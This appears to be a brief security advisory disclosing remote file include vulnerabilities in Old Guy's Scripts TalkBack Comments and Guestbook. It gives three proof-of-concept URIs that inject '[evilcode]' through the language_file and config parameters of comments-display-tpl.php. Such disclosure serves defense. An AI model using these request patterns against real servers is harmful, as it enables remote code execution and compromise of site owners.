Old Guy's Scripts TalkBack Comments and Guestbook Multiple Remote File Include Vulnerabilities

Old Guy's Scripts TalkBack Comments and Guestbook Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/path/comments-display-tpl.php?language_file=[evilcode]
http://www.example.com/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://www.example.com/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]